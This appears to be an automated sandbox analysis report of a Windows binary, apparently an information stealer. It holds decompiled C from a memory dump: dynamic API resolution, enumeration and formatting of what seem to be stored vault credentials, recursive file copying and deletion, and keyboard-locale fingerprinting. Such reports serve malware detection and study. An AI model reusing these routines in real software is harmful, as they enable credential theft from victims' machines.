GetProcAddress.KERNEL32(00000000,00C17DC0), ref: 00419E09
GetProcAddress.KERNEL32(00000000,00C17C60), ref: 00419E24
GetProcAddress.KERNEL32(00000000,00C186E8), ref: 00419E3A
GetProcAddress.KERNEL32(00000000,00C17D60), ref: 00419E56
GetProcAddress.KERNEL32(00000000,00C188C8), ref: 00419E6B
GetProcAddress.KERNEL32(00000000,00C17B40), ref: 00419E81
GetProcAddress.KERNEL32(00000000,00C189D0), ref: 00419EA1
GetProcAddress.KERNEL32(00000000,00C17C00), ref: 00419EB6
GetProcAddress.KERNEL32(00000000,00C18868), ref: 00419ECC
GetProcAddress.KERNEL32(00000000,00C189E8), ref: 00419EE2
GetProcAddress.KERNEL32(00000000,00C17D80), ref: 00419EF7
GetProcAddress.KERNEL32(00000000,00C187A8), ref: 00419F0D
GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 00419F21
GetProcAddress.KERNEL32(00000000,00C18880), ref: 00419F3D
GetProcAddress.KERNEL32(00000000,00C15E88), ref: 00419F5D
GetProcAddress.KERNEL32(00000000,00C17B60), ref: 00419F72
GetProcAddress.KERNEL32(00000000,00C15F50), ref: 00419F88
GetProcAddress.KERNEL32(00000000,00C17DE0), ref: 00419F9E
GetProcAddress.KERNEL32(00000000,00C18898), ref: 00419FB3
GetProcAddress.KERNEL32(00000000,00C18850), ref: 00419FC9
GetProcAddress.KERNEL32(00000000,00C17C80), ref: 00419FDF
GetProcAddress.KERNEL32(00000000,00C17E00), ref: 00419FF4
GetProcAddress.KERNEL32(00000000,00C188B0), ref: 0041A014
GetProcAddress.KERNEL32(00000000,00C18A48), ref: 0041A02A
GetProcAddress.KERNEL32(00000000,00C17F00), ref: 0041A03F
GetProcAddress.KERNEL32(00000000,00C17E20), ref: 0041A055
GetProcAddress.KERNEL32(00000000,00C172C8), ref: 0041A06B
GetProcAddress.KERNEL32(00000000,00C18A00), ref: 0041A080
GetProcAddress.KERNEL32(00000000,00C187C0), ref: 0041A096
GetProcAddress.KERNEL32(00000000,00C18A18), ref: 0041A0AC
GetProcAddress.KERNEL32(00000000,00C17DA0), ref: 0041A0CB
GetProcAddress.KERNEL32(00000000,00C18928), ref: 0041A0E1
GetProcAddress.KERNEL32(00000000,00C18958), ref: 0041A0F7
GetProcAddress.KERNEL32(00000000,00C17BA0), ref: 0041A10C
GetProcAddress.KERNEL32(00000000,00C17248), ref: 0041A122
GetProcAddress.KERNEL32(00000000,00C17E40), ref: 0041A138
GetProcAddress.KERNEL32(00000000,00C17E60), ref: 0041A14D

Strings

HeapFree, xrefs: 00419B82
RegEnumValueA, xrefs: 00419F18

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HeapFree$RegEnumValueA
API String ID: 2238633743-3819337796
Opcode ID: 90ef07fcd7b925f46b8ad25f3b92ab2857b100e4aaa4e3dee816f5f4efc41360
Instruction ID: 49dd401f3f8a9704e5ea376b98ecc7ad5ccb799543314d91de91546e4023b833
Opcode Fuzzy Hash: 90ef07fcd7b925f46b8ad25f3b92ab2857b100e4aaa4e3dee816f5f4efc41360
Instruction Fuzzy Hash: 6D624BB5900204EFC748EFA8EE9899ABBF9FB4C301B14E629E505D3360D7B49541CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041BEE0, Relevance: 66.5, APIs: 44, Instructions: 492
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041BEE0(void* __ebx) {
				int _v8;
				int _v12;
				int _v16;
				short* _v20;
				signed char _v21;
				signed int _v28;
				char _v284;
				char _v540;
				char _v796;
				int _v800;
				struct _OSVERSIONINFOA _v956;
				struct HINSTANCE__* _v960;
				char _v1220;
				intOrPtr _v1224;
				signed int _v1228;
				int _v1232;
				int _v1236;
				int _v1240;
				intOrPtr* _v1244;
				short* _v1248;
				char _v1249;
				intOrPtr _v1256;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t155;
				struct HINSTANCE__* _t162;
				int _t166;
				CHAR* _t171;
				CHAR* _t176;
				short* _t178;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				intOrPtr _t208;
				intOrPtr _t217;
				intOrPtr _t234;
				void* _t256;
				CHAR* _t258;
				CHAR* _t262;
				CHAR* _t264;
				intOrPtr _t267;
				intOrPtr _t276;
				short* _t287;
				intOrPtr _t289;
				intOrPtr _t292;
				intOrPtr _t299;
				intOrPtr _t304;
				CHAR* _t309;
				CHAR* _t311;
				intOrPtr _t324;
				short* _t335;
				intOrPtr _t337;
				short* _t340;
				intOrPtr _t347;
				intOrPtr _t358;
				signed int _t359;
				void* _t360;
				void* _t362;
				void* _t363;
				void* _t372;
				void* _t381;

				_t256 = __ebx;
				_t155 =  *0x4301f4; // 0x3b2bc12f
				_v28 = _t155 ^ _t359;
				_v956.dwOSVersionInfoSize = 0;
				E004091C0( &(_v956.dwMajorVersion), 0, 0x90);
				E004091C0( &_v956, 0, 0x94);
				_t362 = _t360 + 0x18;
				_v956.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v956);
				if(_v956.dwMajorVersion != 6 || _v956.dwMinorVersion < 2) {
					_v1240 = 0;
				} else {
					_v1240 = 1;
				}
				_v21 = _v1240;
				_v20 = 0;
				_v960 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v800 = 0;
				_t258 =  *0x432504; // 0xc159a0
				_t162 = LoadLibraryA(_t258); // executed
				_v960 = _t162;
				if(_v960 == 0) {
					L29:
					 *0x432760(_v8);
					 *0x432740(); // executed
					_t166 = FreeLibrary(_v960); // executed
					__eflags = _v28 ^ _t359;
					return E00404354(_t166, _t256, _v28 ^ _t359, _v8, _t357, _t358,  &_v16);
				} else {
					_t309 =  *0x4322ec; // 0xc16bf0
					 *0x432704 = GetProcAddress(_v960, _t309);
					_t262 =  *0x4324a0; // 0xc16c08
					 *0x432740 = GetProcAddress(_v960, _t262);
					_t171 =  *0x4324d4; // 0xc16310
					 *0x432758 = GetProcAddress(_v960, _t171);
					_t311 =  *0x4323a8; // 0xc16c50
					 *0x4326fc = GetProcAddress(_v960, _t311);
					_t264 =  *0x4323a8; // 0xc16c50
					 *0x43275c = GetProcAddress(_v960, _t264);
					_t176 =  *0x4326ec; // 0xc16c68
					 *0x432760 = GetProcAddress(_v960, _t176);
					_t178 =  *0x432704(0x43108c, 0,  &_v16); // executed
					_v20 = _t178;
					if(_v20 != 0) {
						goto L29;
					}
					_t314 = _v16;
					_v20 =  *0x432758(_v16, 0x200,  &_v12,  &_v8);
					if(_v20 == 0 && _v12 != 0) {
						_t181 =  *0x432188; // 0xc16828
						_t267 =  *0x4325d0; // 0xc16c20
						_t182 = E004055AB(_t267, _t181);
						_t363 = _t362 + 8;
						_v1224 = _t182;
						_v1228 = 0;
						while(_v1228 < _v12) {
							if((_v21 & 0x000000ff) == 0) {
								_v1236 = _v1228 * 0x34 + _v8;
								_t357 = 0x43109c;
								_t358 = _v1236;
								__eflags = 0;
								asm("repe cmpsd");
								if(0 != 0) {
									L27:
									_t314 = _v1228 + 1;
									_v1228 = _v1228 + 1;
									continue;
								}
								WideCharToMultiByte(0, 0,  *(_v1236 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
								_v1244 =  &_v284;
								_t340 = _v1244 + 1;
								__eflags = _t340;
								_v1248 = _t340;
								do {
									_v1249 =  *_v1244;
									_v1244 = _v1244 + 1;
									__eflags = _v1249;
								} while (_v1249 != 0);
								_v1256 = _v1244 - _v1248;
								__eflags = _v1256 - 2;
								if(__eflags > 0) {
									WideCharToMultiByte(0, 0,  *(_v1236 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
									_t193 =  *0x4323c8; // 0xc16bc0
									E004055C2(_t256, 0x43109c, _t358, __eflags);
									E004055C2(_t256, 0x43109c, _t358, __eflags);
									_t276 =  *0x4323b8; // 0xc16c38
									E004055C2(_t256, 0x43109c, _t358, __eflags);
									E004055C2(_t256, _t357, _t358, __eflags);
									WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1236 + 0x14)) + 0x20, 0xffffffff,  &_v1220, 0x100, 0, 0);
									_t347 =  *0x432258; // 0xc16bd8
									E004055C2(_t256, _t357, _t358, __eflags);
									E004055C2(_t256, _t357, _t358, __eflags);
									WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1236 + 0x18)) + 0x20, 0xffffffff,  &_v796, 0x100, 0, 0);
									_t208 =  *0x4322b4; // 0xc168d8
									E004055C2(_t256, _t357, _t358, __eflags);
									E004055C2(_t256, _t357, _t358, __eflags);
									_t381 = _t363 + 0x4c;
									_v800 = 0;
									_v20 =  *0x4326fc(_v16, _v1236,  *((intOrPtr*)(_v1236 + 0x14)),  *((intOrPtr*)(_v1236 + 0x18)), 0, 0,  &_v800, _v1224, "\n", _v1224, _t208,  &_v796, _v1224, "\n", _v1224, _t347,  &_v1220, _v1224, "\n", _v1224, _t276,  &_v284, _v1224, "\n", _v1224, _t193);
									__eflags = _v20;
									if(__eflags == 0) {
										_v1236 = _v800;
										_t287 =  *((intOrPtr*)(_v1236 + 0x1c)) + 0x20;
										__eflags = _t287;
										WideCharToMultiByte(0, 0, _t287, 0xffffffff,  &_v540, 0x100, 0, 0);
										_push( &_v540);
										_t217 =  *0x4326c4; // 0xc16aa0
										_push(_t217);
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_push("\n\n");
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_t363 = _t381 + 0x14;
									} else {
										_t289 =  *0x4321a4; // 0xc166f8
										_push(_t289);
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_push("\n\n");
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_t363 = _t381 + 0x10;
									}
								}
								__eflags = _v800;
								if(__eflags != 0) {
									 *0x432760(_v800);
								}
								goto L27;
							}
							_v1232 = _v1228 * 0x38 + _v8;
							_t357 = 0x43109c;
							_t358 = _v1232;
							asm("repe cmpsd");
							if(0 == 0) {
								WideCharToMultiByte(0, 0,  *(_v1232 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
								_t292 =  *0x4323c8; // 0xc16bc0
								E004055C2(_t256, 0x43109c, _t358, 0);
								E004055C2(_t256, 0x43109c, _t358, 0);
								_t324 =  *0x4323b8; // 0xc16c38
								E004055C2(_t256, 0x43109c, _t358, 0);
								E004055C2(_t256, _t357, _t358, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1232 + 0x14)) + 0x20, 0xffffffff,  &_v1220, 0x100, 0, 0);
								_t234 =  *0x432258; // 0xc16bd8
								E004055C2(_t256, _t357, _t358, 0);
								E004055C2(_t256, _t357, _t358, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1232 + 0x18)) + 0x20, 0xffffffff,  &_v796, 0x100, 0, 0);
								_t299 =  *0x4322b4; // 0xc168d8
								E004055C2(_t256, _t357, _t358, 0);
								E004055C2(_t256, _t357, _t358, 0);
								_t372 = _t363 + 0x4c;
								_v800 = 0;
								_v20 =  *0x43275c(_v16, _v1232,  *((intOrPtr*)(_v1232 + 0x14)),  *((intOrPtr*)(_v1232 + 0x18)), 0, 0, 0,  &_v800, _v1224, "\n", _v1224, _t299,  &_v796, _v1224, "\n", _v1224, _t234,  &_v1220, _v1224, "\n", _v1224, _t324,  &_v284, _v1224, "\n", _v1224, _t292);
								_t395 = _v20;
								if(_v20 == 0) {
									_v1232 = _v800;
									_t335 =  *((intOrPtr*)(_v1232 + 0x1c)) + 0x20;
									__eflags = _t335;
									WideCharToMultiByte(0, 0, _t335, 0xffffffff,  &_v540, 0x100, 0, 0);
									_push( &_v540);
									_t304 =  *0x4326c4; // 0xc16aa0
									_push(_t304);
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, __eflags);
									_push("\n\n");
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, __eflags);
									_t363 = _t372 + 0x14;
								} else {
									_t337 =  *0x4321a4; // 0xc166f8
									_push(_t337);
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, _t395);
									_push("\n\n");
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, _t395);
									_t363 = _t372 + 0x10;
								}
								 *0x432760(_v800);
							}
							goto L27;
						}
						_push(_v1224);
						E00405EA3(_t256, _t314, _t357, _t358, __eflags);
					}
					goto L29;
				}
			}

0x0041bee0
0x0041bee9
0x0041bef0
0x0041bef5
0x0041bf0d
0x0041bf23
0x0041bf28
0x0041bf2b
0x0041bf3c
0x0041bf49
0x0041bf60
0x0041bf54
0x0041bf54
0x0041bf54
0x0041bf70
0x0041bf73
0x0041bf7a
0x0041bf84
0x0041bf8b
0x0041bf92
0x0041bf99
0x0041bfa3
0x0041bfaa
0x0041bfb0
0x0041bfbd
0x0041c618
0x0041c61c
0x0041c626
0x0041c633
0x0041c63e
0x0041c648
0x0041bfc3
0x0041bfc3
0x0041bfd7
0x0041bfdc
0x0041bff0
0x0041bff5
0x0041c008
0x0041c00d
0x0041c021
0x0041c026
0x0041c03a
0x0041c03f
0x0041c052
0x0041c062
0x0041c068
0x0041c06f
0x00000000
0x00000000
0x0041c082
0x0041c08c
0x0041c093
0x0041c0a3
0x0041c0a9
0x0041c0b0
0x0041c0b5
0x0041c0b8
0x0041c0be
0x0041c0d9
0x0041c0ee
0x0041c349
0x0041c354
0x0041c359
0x0041c35f
0x0041c361
0x0041c363
0x0041c604
0x0041c0d0
0x0041c0d3
0x00000000
0x0041c0d3
0x0041c389
0x0041c395
0x0041c3a1
0x0041c3a1
0x0041c3a4
0x0041c3aa
0x0041c3b2
0x0041c3b8
0x0041c3bf
0x0041c3bf
0x0041c3d4
0x0041c3da
0x0041c3e1
0x0041c407
0x0041c40d
0x0041c41a
0x0041c42e
0x0041c43d
0x0041c44b
0x0041c45f
0x0041c48a
0x0041c497
0x0041c4a5
0x0041c4b9
0x0041c4e4
0x0041c4f1
0x0041c4fe
0x0041c512
0x0041c517
0x0041c51a
0x0041c554
0x0041c557
0x0041c55b
0x0041c58f
0x0041c5b0
0x0041c5b0
0x0041c5b8
0x0041c5c4
0x0041c5c5
0x0041c5ca
0x0041c5d1
0x0041c5d2
0x0041c5da
0x0041c5e5
0x0041c5e6
0x0041c5eb
0x0041c55d
0x0041c55d
0x0041c563
0x0041c56a
0x0041c56b
0x0041c573
0x0041c57e
0x0041c57f
0x0041c584
0x0041c584
0x0041c55b
0x0041c5ee
0x0041c5f5
0x0041c5fe
0x0041c5fe
0x00000000
0x0041c5f5
0x0041c100
0x0041c10b
0x0041c110
0x0041c118
0x0041c11a
0x0041c140
0x0041c146
0x0041c154
0x0041c168
0x0041c177
0x0041c185
0x0041c199
0x0041c1c4
0x0041c1d1
0x0041c1de
0x0041c1f2
0x0041c21d
0x0041c22a
0x0041c238
0x0041c24c
0x0041c251
0x0041c254
0x0041c290
0x0041c293
0x0041c297
0x0041c2cb
0x0041c2ec
0x0041c2ec
0x0041c2f4
0x0041c300
0x0041c301
0x0041c307
0x0041c30e
0x0041c30f
0x0041c317
0x0041c322
0x0041c323
0x0041c328
0x0041c299
0x0041c299
0x0041c29f
0x0041c2a6
0x0041c2a7
0x0041c2af
0x0041c2ba
0x0041c2bb
0x0041c2c0
0x0041c2c0
0x0041c332
0x0041c332
0x00000000
0x0041c338
0x0041c60f
0x0041c610
0x0041c615
0x00000000
0x0041c093

APIs

_memset.LIBCMT ref: 0041BF0D
_memset.LIBCMT ref: 0041BF23
GetVersionExA.KERNEL32(00000094), ref: 0041BF3C
LoadLibraryA.KERNEL32(00C159A0), ref: 0041BFAA
GetProcAddress.KERNEL32(00000000,00C16BF0), ref: 0041BFD1
GetProcAddress.KERNEL32(00000000,00C16C08), ref: 0041BFEA
GetProcAddress.KERNEL32(00000000,00C16310), ref: 0041C002
GetProcAddress.KERNEL32(00000000,00C16C50), ref: 0041C01B
GetProcAddress.KERNEL32(00000000,00C16C50), ref: 0041C034
GetProcAddress.KERNEL32(00000000,00C16C68), ref: 0041C04C

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$_memset$LibraryLoadVersion
String ID:
API String ID: 173895360-0
Opcode ID: f59af888b5717aaf9566395d8c9c53b99e9af5a8d934e0a4aaff498b539cd5cb
Instruction ID: 9c1cb109650bf368c340d73eaff42f367f4baa9dcd49982eb3bde8b86a13c175
Opcode Fuzzy Hash: f59af888b5717aaf9566395d8c9c53b99e9af5a8d934e0a4aaff498b539cd5cb
Instruction Fuzzy Hash: D412AFB1A00218AFDB64DF50DD85FDAB7B9EB48704F1042D9F609A72D0D7B4AA84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00420540, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00420540(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char _v1132;
				intOrPtr* _v1136;
				intOrPtr* _v1140;
				char _v1141;
				char _v1142;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr* _v1156;
				intOrPtr* _v1160;
				char _v1161;
				char _v1162;
				intOrPtr _v1168;
				intOrPtr _v1172;
				signed int _t72;
				int _t77;
				char _t78;
				int _t81;
				char _t83;
				void* _t87;
				char _t97;
				char _t98;
				void* _t99;
				intOrPtr* _t117;
				intOrPtr* _t118;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				void* _t130;
				void* _t131;

				_t125 = __esi;
				_t124 = __edi;
				_t99 = __ebx;
				_t72 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t72 ^ _t126;
				wsprintfA( &_v276, "%s\\*", _a12);
				_t128 = _t127 + 0xc;
				_t116 =  &_v604;
				_t77 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t77;
				if(_v280 != 0xffffffff) {
					do {
						_v1136 = ".";
						_v1140 =  &(_v604.cFileName);
						while(1) {
							_t117 = _v1140;
							_t78 =  *_t117;
							_v1141 = _t78;
							if(_t78 !=  *_v1136) {
								break;
							}
							if(_v1141 == 0) {
								L7:
								_v1148 = 0;
							} else {
								_t117 = _v1140;
								_t98 =  *((intOrPtr*)(_t117 + 1));
								_v1142 = _t98;
								_t19 = _v1136 + 1; // 0x2e000000
								if(_t98 !=  *_t19) {
									break;
								} else {
									_v1140 = _v1140 + 2;
									_v1136 = _v1136 + 2;
									if(_v1142 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							_v1152 = _v1148;
							if(_v1152 != 0) {
								_v1156 = "..";
								_v1160 =  &(_v604.cFileName);
								while(1) {
									_t118 = _v1160;
									_t83 =  *_t118;
									_v1161 = _t83;
									if(_t83 !=  *_v1156) {
										break;
									}
									if(_v1161 == 0) {
										L15:
										_v1168 = 0;
									} else {
										_t118 = _v1160;
										_t97 =  *((intOrPtr*)(_t118 + 1));
										_v1162 = _t97;
										_t41 = _v1156 + 1; // 0x2500002e
										if(_t97 !=  *_t41) {
											break;
										} else {
											_v1160 = _v1160 + 2;
											_v1156 = _v1156 + 2;
											if(_v1162 != 0) {
												continue;
											} else {
												goto L15;
											}
										}
									}
									L17:
									_v1172 = _v1168;
									if(_v1172 != 0) {
										wsprintfA( &_v1132, "%s\\%s", _a12,  &(_v604.cFileName));
										_t87 = E004052FA(_t125, _a8, 0x429492);
										_t130 = _t128 + 0x18;
										if(_t87 != 0) {
											wsprintfA( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
											_t131 = _t130 + 0x10;
										} else {
											wsprintfA( &_v868, "%s",  &(_v604.cFileName));
											_t131 = _t130 + 0xc;
										}
										E00419580(_a4,  &_v868,  &_v1132); // executed
										DeleteFileA( &_v1132); // executed
										E00420540(_t99, _t124, _t125, _a4,  &_v868,  &_v1132); // executed
										_t128 = _t131 + 0x18;
									} else {
										goto L18;
									}
									goto L23;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								_v1168 = _t118;
								goto L17;
							}
							goto L23;
						}
						asm("sbb edx, edx");
						asm("sbb edx, 0xffffffff");
						_v1148 = _t117;
						goto L9;
						L23:
						_t116 =  &_v604;
						_t81 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t81 != 0);
					_t77 = FindClose(_v280);
				} else {
				}
				return E00404354(_t77, _t99, _v8 ^ _t126, _t116, _t124, _t125);
			}

0x00420540
0x00420540
0x00420540
0x00420549
0x00420550
0x00420563
0x00420569
0x0042056c
0x0042057a
0x00420580
0x0042058d
0x00420594
0x00420594
0x004205a4
0x004205aa
0x004205aa
0x004205b0
0x004205b2
0x004205c0
0x00000000
0x00000000
0x004205c9
0x004205fc
0x004205fc
0x004205cb
0x004205cb
0x004205d1
0x004205d4
0x004205e0
0x004205e3
0x00000000
0x004205e5
0x004205e5
0x004205ec
0x004205fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004205fa
0x004205e3
0x00420613
0x00420619
0x00420626
0x0042062c
0x0042063c
0x00420642
0x00420642
0x00420648
0x0042064a
0x00420658
0x00000000
0x00000000
0x00420661
0x00420694
0x00420694
0x00420663
0x00420663
0x00420669
0x0042066c
0x00420678
0x0042067b
0x00000000
0x0042067d
0x0042067d
0x00420684
0x00420692
0x00000000
0x00000000
0x00000000
0x00000000
0x00420692
0x0042067b
0x004206ab
0x004206b1
0x004206be
0x004206dc
0x004206ee
0x004206f3
0x004206f8
0x0042072f
0x00420735
0x004206fa
0x0042070d
0x00420713
0x00420713
0x0042074a
0x00420759
0x00420771
0x00420776
0x00000000
0x00000000
0x00000000
0x00000000
0x004206be
0x004206a0
0x004206a2
0x004206a5
0x00000000
0x004206a5
0x00000000
0x00420626
0x00420608
0x0042060a
0x0042060d
0x00000000
0x00420779
0x00420779
0x00420787
0x0042078d
0x0042079c
0x00000000
0x0042058f
0x004207af

APIs

wsprintfA.USER32 ref: 00420563
FindFirstFileA.KERNELBASE(?,?), ref: 0042057A
FindNextFileA.KERNELBASE(000000FF,?), ref: 00420787
FindClose.KERNEL32(000000FF), ref: 0042079C

Strings

%s\*, xrefs: 00420557
%s\%s, xrefs: 00420723
%s\%s, xrefs: 004206D0

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: b36d20a79696500d5966cc1085c2a3eae8138d24e48df022eca772712e802837
Instruction ID: 325be172129785ba22ad8cdf846aec29f32f218cb4471343c49e7a9d9cf57eda
Opcode Fuzzy Hash: b36d20a79696500d5966cc1085c2a3eae8138d24e48df022eca772712e802837
Instruction Fuzzy Hash: C7618CB0A042289FCB24CF64EC44BEAB7B5AB48304F4486DAE64952242D7759E89CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA60, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 88
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041AA60(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v12;
				char _v524;
				int _v528;
				int _v532;
				void* _v536;
				signed int _v540;
				signed int _t34;
				void* _t56;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t73;
				void* _t74;

				_t71 = __esi;
				_t70 = __edi;
				_t56 = __ebx;
				_t34 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t34 ^ _t72;
				_v536 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_v8 = 0;
				_v532 = GetKeyboardLayoutList(0, 0);
				_v8 = LocalAlloc(0x40, _v532 << 2);
				_t65 = _v532;
				_v532 = GetKeyboardLayoutList(_v532, _v8);
				_v540 = 0;
				while(_v540 < _v532) {
					GetLocaleInfoA( *(_v8 + _v540 * 4) & 0x0000ffff, 2,  &_v524, 0x200); // executed
					if(_v528 == 0) {
						wsprintfA(_v536, "%s",  &_v524);
						_t74 = _t73 + 0xc;
					} else {
						wsprintfA(_v536, "%s / %s", _v536,  &_v524);
						_t74 = _t73 + 0x10;
					}
					_t65 = _v528 + 1;
					_v528 = _v528 + 1;
					E004091C0( &_v524, 0, 0x200);
					_t73 = _t74 + 0xc;
					_v540 = _v540 + 1;
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return E00404354(_v536, _t56, _v12 ^ _t72, _t65, _t70, _t71);
			}

0x0041aa60
0x0041aa60
0x0041aa60
0x0041aa69
0x0041aa70
0x0041aa87
0x0041aa8d
0x0041aa97
0x0041aaa8
0x0041aac0
0x0041aac7
0x0041aad4
0x0041aada
0x0041aaf5
0x0041ab23
0x0041ab30
0x0041ab6a
0x0041ab70
0x0041ab32
0x0041ab4c
0x0041ab52
0x0041ab52
0x0041ab79
0x0041ab7c
0x0041ab90
0x0041ab95
0x0041aaef
0x0041aaef
0x0041aba1
0x0041aba7
0x0041aba7
0x0041abc0

APIs

GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0041AA7A
HeapAlloc.KERNEL32(00000000), ref: 0041AA81
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041AAA2
LocalAlloc.KERNEL32(00000040,?), ref: 0041AABA
GetKeyboardLayoutList.USER32(?,00000000), ref: 0041AACE
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041AB23
wsprintfA.USER32 ref: 0041AB4C
wsprintfA.USER32 ref: 0041AB6A
_memset.LIBCMT ref: 0041AB90
LocalFree.KERNEL32(00000000), ref: 0041ABA7

Strings

%s / %s, xrefs: 0041AB40

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
String ID: %s / %s
API String ID: 2849719339-2910687431
Opcode ID: 1cfaaa4263921e670d447bf10fd0bbaabef4cbf546bfbcacf261dfb8817fc39c
Instruction ID: b0ee2a266da5aaddb125032d73e6c8a54dd55c1a0deb21e767daa8be60d16efc
Opcode Fuzzy Hash: 1cfaaa4263921e670d447bf10fd0bbaabef4cbf546bfbcacf261dfb8817fc39c
Instruction Fuzzy Hash: 003149B0A4021CDBDB64DF54DD89BE9B7B4FB48304F1042D9E519A6281CBB46EC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C810, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C810() {
				CHAR* _t1;
				struct HINSTANCE__* _t2;
				CHAR* _t5;
				struct HINSTANCE__* _t7;
				CHAR* _t10;
				struct HINSTANCE__* _t12;
				CHAR* _t15;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				CHAR* _t27;
				struct HINSTANCE__* _t28;

				_t1 =  *0x432568; // 0xc11548
				_t2 = LoadLibraryA(_t1); // executed
				 *0x43274c = _t2;
				if( *0x43274c == 0) {
					return 0;
				}
				_t18 =  *0x43247c; // 0xc15a48
				_t24 =  *0x43274c; // 0x60900000
				 *0x432750 = GetProcAddress(_t24, _t18);
				_t5 =  *0x432140; // 0xc10530
				_t19 =  *0x43274c; // 0x60900000
				 *0x432700 = GetProcAddress(_t19, _t5);
				_t25 =  *0x432408; // 0xc15940
				_t7 =  *0x43274c; // 0x60900000
				 *0x432720 = GetProcAddress(_t7, _t25);
				_t20 =  *0x4323f0; // 0xc165f0
				_t26 =  *0x43274c; // 0x60900000
				 *0x43273c = GetProcAddress(_t26, _t20);
				_t10 =  *0x43241c; // 0xc164d0
				_t21 =  *0x43274c; // 0x60900000
				 *0x432724 = GetProcAddress(_t21, _t10);
				_t27 =  *0x4325f4; // 0xc15880
				_t12 =  *0x43274c; // 0x60900000
				 *0x432754 = GetProcAddress(_t12, _t27);
				_t22 =  *0x43250c; // 0xc16450
				_t28 =  *0x43274c; // 0x60900000
				 *0x43272c = GetProcAddress(_t28, _t22);
				_t15 =  *0x432650; // 0xc163f0
				_t23 =  *0x43274c; // 0x60900000
				 *0x432734 = GetProcAddress(_t23, _t15);
				return 1;
			}

0x0041c813
0x0041c819
0x0041c81f
0x0041c82b
0x00000000
0x0041c8fb
0x0041c831
0x0041c838
0x0041c845
0x0041c84a
0x0041c850
0x0041c85d
0x0041c862
0x0041c869
0x0041c875
0x0041c87a
0x0041c881
0x0041c88e
0x0041c893
0x0041c899
0x0041c8a6
0x0041c8ab
0x0041c8b2
0x0041c8be
0x0041c8c3
0x0041c8ca
0x0041c8d7
0x0041c8dc
0x0041c8e2
0x0041c8ef
0x00000000

APIs

LoadLibraryA.KERNEL32(00C11548), ref: 0041C819
GetProcAddress.KERNEL32(60900000,00C15A48), ref: 0041C83F
GetProcAddress.KERNEL32(60900000,00C10530), ref: 0041C857
GetProcAddress.KERNEL32(60900000,00C15940), ref: 0041C86F
GetProcAddress.KERNEL32(60900000,00C165F0), ref: 0041C888
GetProcAddress.KERNEL32(60900000,00C164D0), ref: 0041C8A0
GetProcAddress.KERNEL32(60900000,00C15880), ref: 0041C8B8
GetProcAddress.KERNEL32(60900000,00C16450), ref: 0041C8D1
GetProcAddress.KERNEL32(60900000,00C163F0), ref: 0041C8E9
